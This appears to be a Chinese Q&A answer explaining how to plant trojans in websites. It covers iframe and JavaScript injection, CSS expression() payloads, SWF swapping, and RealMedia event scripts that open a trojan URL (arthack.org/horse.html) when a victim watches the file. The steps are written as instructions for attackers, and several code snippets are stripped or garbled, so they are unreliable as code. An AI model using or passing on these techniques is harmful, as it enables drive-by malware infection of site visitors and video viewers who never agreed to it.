网站挂马的方法有哪些?
(1) HTML挂马法。
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像。查看站点是否被挂,一般是查找一下关键词iframe。
(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入 ,horse里的js写法一般为 document。 write(’http://www。arthack。org/horse。html’>;,或者专业一点的写法是 top。document。body。innerHTML = top。document。 body。innerHTML + ‘rn”;。不过第2种写法要注意:是原来的网页种要有body标签。
3) 在 css中挂马。
这个方...全部
(1) HTML挂马法。
常规的HTML挂马方法一般是在网页中插入一条iframe语句,像。查看站点是否被挂,一般是查找一下关键词iframe。
(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入 ,horse里的js写法一般为 document。
write(’http://www。arthack。org/horse。html’>;,或者专业一点的写法是 top。document。body。innerHTML = top。document。
body。innerHTML + ‘rn”;。不过第2种写法要注意:是原来的网页种要有body标签。
3) 在 css中挂马。
这个方法就是在css中写入
body {
hytop:expression(top。
document。body。innerHTML = top。document。body。innerHTML + ‘rn’);
}
然后在主页中调用这个CSS,代码类似http://www。arthack。
org/css。css” rel=”stylesheet” type=”text/css”>这样的。在csdn 中对expression的解释是:IE5及其以后版本支持在CSS中使用expression,用来吧CSS属性和javascript表达式关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。
也就是说CSS属性后面可以是一段Javasccript表达式,CSS属性的值等于 javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法,也可以使用其它浏览器对象。
这个表达式就好像是在这个元素的一个成员函数中一样。整个解释关键点是expression可以在css中引入js语句,所以我们可用于挂马。不过写的语句值可以远程调用,本地不可以。
(4) 在swf中挂马
网上有一些swf挂马的工具,可以用工具替换原来网页中的swf或单独把swf发给对方,一可以单独作一个可显示swf页的网页。
在网页中插入swf的语法一般格式为:
(5) 在影音文件中挂马。
所需工具是RealMedia Editor,打开工具后,然后依次选择”文件”-”打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。
接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30。0&&_rpexternal& http://www。arthack。org/horse。htm (00:00:10。
0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30。0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)
输入完毕后并保存,然后依次选择”工具”-”合并事件”,导入刚才的文本。
当合并完成后,依次选择”文本”-”Real文件另存为”,保存好即可。
最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址。收起